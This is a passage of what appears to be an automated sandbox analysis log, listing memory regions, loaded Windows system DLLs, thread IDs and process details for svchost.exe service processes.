region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 37205 start_va = 0x110000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 37206 start_va = 0xbd0000 end_va = 0xbd7fff entry_point = 0xbd0000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 37207 start_va = 0x77b00000 end_va = 0x77c3bfff entry_point = 0x77b00000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 37208 start_va = 0x77d40000 end_va = 0x77d40fff entry_point = 0x77d40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 37209 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 37210 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 37211 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 37212 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 37217 start_va = 0x150000 end_va = 0x25ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 37218 start_va = 0x77990000 end_va = 0x77a63fff entry_point = 0x77990000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 37219 start_va = 0x75eb0000 end_va = 0x75ef9fff entry_point = 0x75eb0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 37220 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 37221 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 37222 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 37223 start_va = 0x75f50000 end_va = 0x75ffbfff entry_point = 0x75f50000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 37224 start_va = 0x77c40000 end_va = 0x77c58fff entry_point = 0x77c40000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 37225 start_va = 0x77c80000 end_va = 0x77d20fff entry_point = 0x77c80000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 37226 start_va = 0x260000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 37241 start_va = 0x3c0000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 37242 start_va = 0x420000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 37243 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 37244 start_va = 0x380000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 37245 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 37246 start_va = 0xc0000 end_va = 0xfffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 37247 start_va = 0x430000 end_va = 0x6fefff entry_point = 0x430000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 37248 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 37249 start_va = 0x75240000 end_va = 0x7524dfff entry_point = 0x75240000 region_type = mapped_file name = "rpcepmap.dll" filename = "\\Windows\\System32\\RpcEpMap.dll" (normalized: "c:\\windows\\system32\\rpcepmap.dll") Region: id = 37250 start_va = 0x75c40000 end_va = 0x75c4dfff entry_point = 0x75c40000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 37251 start_va = 0x75b30000 end_va = 0x75b37fff entry_point = 0x75b30000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 37252 start_va = 0x75b80000 end_va = 0x75b9afff entry_point = 0x75b80000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 37253 start_va = 0x75740000 end_va = 0x75755fff entry_point = 0x75740000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 37254 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 37255 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 37256 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 37257 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 37258 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 37259 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 37260 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 37261 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 37262 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 37263 start_va = 0x753e0000 end_va = 0x753e7fff entry_point = 0x753e0000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 37264 start_va = 0x75ba0000 end_va = 0x75babfff entry_point = 0x75ba0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 37265 start_va = 0x7b0000 end_va = 0x7effff entry_point = 0x0 region_type = private name = "private_0x00000000007b0000" filename = "" Region: id = 37266 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 37267 start_va = 0x280000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 37268 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 37269 start_va = 0x880000 end_va = 0x8bffff entry_point = 0x0 region_type = private name = "private_0x0000000000880000" filename = "" Region: id = 37270 start_va = 0x75250000 end_va = 0x752aefff entry_point = 0x75250000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 37271 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 37275 start_va = 0x770000 end_va = 0x7affff entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 37276 start_va = 0x76000000 end_va = 0x7609ffff entry_point = 0x76000000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 37277 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 37278 start_va = 0x75740000 end_va = 0x75755fff entry_point = 0x75740000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 37279 start_va = 0xc0000 end_va = 0xfbfff entry_point = 0xc0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 37280 start_va = 0xc0000 end_va = 0xfbfff entry_point = 0xc0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 37281 start_va = 0xc0000 end_va = 0xfbfff entry_point = 0xc0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 37282 start_va = 0xc0000 end_va = 0xfbfff entry_point = 0xc0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 37283 start_va = 0xc0000 end_va = 0xfbfff entry_point = 0xc0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 37284 start_va = 0x754e0000 end_va = 0x7551afff entry_point = 0x754e0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 37285 start_va = 0x77120000 end_va = 0x77154fff entry_point = 0x77120000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 37286 start_va = 0x770f0000 end_va = 0x770f5fff entry_point = 0x770f0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 37287 start_va = 0x75700000 end_va = 0x7573bfff entry_point = 0x75700000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 37288 start_va = 0x77780000 end_va = 0x77848fff entry_point = 0x77780000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 37289 start_va = 0x77160000 end_va = 0x771adfff entry_point = 0x77160000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 37290 start_va = 0x77c60000 end_va = 0x77c69fff entry_point = 0x77c60000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 37291 start_va = 0x77210000 end_va = 0x772acfff entry_point = 0x77210000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 37292 start_va = 0xc0000 end_va = 0xdcfff entry_point = 0xc0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 37293 start_va = 0x8c0000 end_va = 0x987fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008c0000" filename = "" Region: id = 37294 start_va = 0xc0000 end_va = 0xdcfff entry_point = 0xc0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 37295 start_va = 0x77100000 end_va = 0x7711efff entry_point = 0x77100000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 37296 start_va = 0x763d0000 end_va = 0x7649bfff entry_point = 0x763d0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 37297 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 37298 start_va = 0xc0000 end_va = 0xc1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 37299 start_va = 0xd0000 end_va = 0xd0fff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 37300 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 37301 start_va = 0x2c0000 end_va = 0x33ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002c0000" filename = "" Region: id = 37302 start_va = 0x990000 end_va = 0xa90fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000990000" filename = "" Region: id = 37303 start_va = 0xbe0000 end_va = 0xfd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000be0000" filename = "" Region: id = 37304 start_va = 0x75230000 end_va = 0x75234fff entry_point = 0x75230000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 37305 start_va = 0x756f0000 end_va = 0x756f5fff entry_point = 0x756f0000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 37306 start_va = 0x75220000 end_va = 0x75225fff entry_point = 0x75220000 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\System32\\wshqos.dll" (normalized: "c:\\windows\\system32\\wshqos.dll") Region: id = 37307 start_va = 0x75210000 end_va = 0x75215fff entry_point = 0x75210000 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\System32\\wshqos.dll" (normalized: "c:\\windows\\system32\\wshqos.dll") Region: id = 37308 start_va = 0x75220000 end_va = 0x75225fff entry_point = 0x75220000 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\System32\\wshqos.dll" (normalized: "c:\\windows\\system32\\wshqos.dll") Region: id = 37309 start_va = 0x75210000 end_va = 0x75215fff entry_point = 0x75210000 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\System32\\wshqos.dll" (normalized: "c:\\windows\\system32\\wshqos.dll") Region: id = 37375 start_va = 0x751b0000 end_va = 0x75225fff entry_point = 0x751b0000 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 37376 start_va = 0x751a0000 end_va = 0x751a8fff entry_point = 0x751a0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 38022 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 38023 start_va = 0x760d0000 end_va = 0x76152fff entry_point = 0x760d0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 38024 start_va = 0x76270000 end_va = 0x763cbfff entry_point = 0x76270000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 38025 start_va = 0x77a70000 end_va = 0x77afefff entry_point = 0x77a70000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 38026 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 38400 start_va = 0x1010000 end_va = 0x104ffff entry_point = 0x0 region_type = private name = "private_0x0000000001010000" filename = "" Region: id = 38401 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Thread: id = 1100 os_tid = 0x284 Thread: id = 1103 os_tid = 0x290 Thread: id = 1105 os_tid = 0x298 Thread: id = 1106 os_tid = 0x29c Thread: id = 1107 os_tid = 0x2a0 Thread: id = 1108 os_tid = 0x2a4 Thread: id = 1109 os_tid = 0x2a8 Thread: id = 1110 os_tid = 0x2ac Thread: id = 1183 os_tid = 0x3e4 Process: id = "672" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x7f1d1160" os_pid = "0x2b0" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "667" os_parent_pid = "0x1c0" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Audiosrv" [0xa], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xe], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\lmhosts" [0xa], "NT SERVICE\\WPCSvc" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000ac58" [0xc000000f], "LOCAL" [0x7] Region: id = 37310 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 37311 start_va = 0x30000 end_va = 0x6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 37312 start_va = 0x70000 end_va = 0x73fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 37313 start_va = 0xbd0000 end_va = 0xbd7fff entry_point = 0xbd0000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 37314 start_va = 0x77b00000 end_va = 0x77c3bfff entry_point = 0x77b00000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 37315 start_va = 0x77d40000 end_va = 0x77d40fff entry_point = 0x77d40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 37316 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 37317 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 37318 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 37319 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 37328 start_va = 0x90000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 37329 start_va = 0x77990000 end_va = 0x77a63fff entry_point = 0x77990000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 37330 start_va = 0x75eb0000 end_va = 0x75ef9fff entry_point = 0x75eb0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 37331 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 37332 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 37333 start_va = 0x90000 end_va = 0xf6fff entry_point = 0x90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 37334 start_va = 0x260000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 37335 start_va = 0x75f50000 end_va = 0x75ffbfff entry_point = 0x75f50000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 37336 start_va = 0x77c40000 end_va = 0x77c58fff entry_point = 0x77c40000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 37337 start_va = 0x77c80000 end_va = 0x77d20fff entry_point = 0x77c80000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 37338 start_va = 0x100000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 37339 start_va = 0x76270000 end_va = 0x763cbfff entry_point = 0x76270000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 37340 start_va = 0x77160000 end_va = 0x771adfff entry_point = 0x77160000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 37341 start_va = 0x77780000 end_va = 0x77848fff entry_point = 0x77780000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 37342 start_va = 0x77c60000 end_va = 0x77c69fff entry_point = 0x77c60000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 37343 start_va = 0x77210000 end_va = 0x772acfff entry_point = 0x77210000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 37344 start_va = 0x100000 end_va = 0x1c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 37345 start_va = 0x1e0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 37346 start_va = 0x1f0000 end_va = 0x20cfff entry_point = 0x1f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 37347 start_va = 0x1f0000 end_va = 0x20cfff entry_point = 0x1f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 37348 start_va = 0x77100000 end_va = 0x7711efff entry_point = 0x77100000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 37349 start_va = 0x763d0000 end_va = 0x7649bfff entry_point = 0x763d0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 37350 start_va = 0x360000 end_va = 0x460fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000360000" filename = "" Region: id = 37351 start_va = 0x470000 end_va = 0x4effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 37352 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 37353 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 37354 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 37355 start_va = 0x200000 end_va = 0x200fff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 37356 start_va = 0x4f0000 end_va = 0x8e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 37357 start_va = 0x8f0000 end_va = 0x94bfff entry_point = 0x8f0000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 37358 start_va = 0x8f0000 end_va = 0x94bfff entry_point = 0x8f0000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 37359 start_va = 0x75ba0000 end_va = 0x75babfff entry_point = 0x75ba0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 37379 start_va = 0x950000 end_va = 0x98ffff entry_point = 0x0 region_type = private name = "private_0x0000000000950000" filename = "" Region: id = 37380 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 37381 start_va = 0x76000000 end_va = 0x7609ffff entry_point = 0x76000000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 37401 start_va = 0xaa0000 end_va = 0xadffff entry_point = 0x0 region_type = private name = "private_0x0000000000aa0000" filename = "" Region: id = 37402 start_va = 0xae0000 end_va = 0xb1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ae0000" filename = "" Region: id = 37403 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 37404 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 37413 start_va = 0x9a0000 end_va = 0x9dffff entry_point = 0x0 region_type = private name = "private_0x00000000009a0000" filename = "" Region: id = 37414 start_va = 0xbe0000 end_va = 0xeaefff entry_point = 0xbe0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 37415 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 37416 start_va = 0x75090000 end_va = 0x7519bfff entry_point = 0x75090000 region_type = mapped_file name = "wevtsvc.dll" filename = "\\Windows\\System32\\wevtsvc.dll" (normalized: "c:\\windows\\system32\\wevtsvc.dll") Region: id = 37417 start_va = 0xeb0000 end_va = 0x1007fff entry_point = 0x0 region_type = private name = "private_0x0000000000eb0000" filename = "" Region: id = 37418 start_va = 0x210000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 37419 start_va = 0xeb0000 end_va = 0xfaffff entry_point = 0x0 region_type = private name = "private_0x0000000000eb0000" filename = "" Region: id = 37420 start_va = 0x1000000 end_va = 0x1007fff entry_point = 0x0 region_type = private name = "private_0x0000000001000000" filename = "" Region: id = 37423 start_va = 0x1070000 end_va = 0x10affff entry_point = 0x0 region_type = private name = "private_0x0000000001070000" filename = "" Region: id = 37424 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 37425 start_va = 0x230000 end_va = 0x230fff entry_point = 0x230000 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 37426 start_va = 0x230000 end_va = 0x230fff entry_point = 0x230000 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 37427 start_va = 0xb20000 end_va = 0xb5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b20000" filename = "" Region: id = 37428 start_va = 0x758e0000 end_va = 0x75921fff entry_point = 0x758e0000 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 37429 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 37430 start_va = 0x75c40000 end_va = 0x75c4dfff 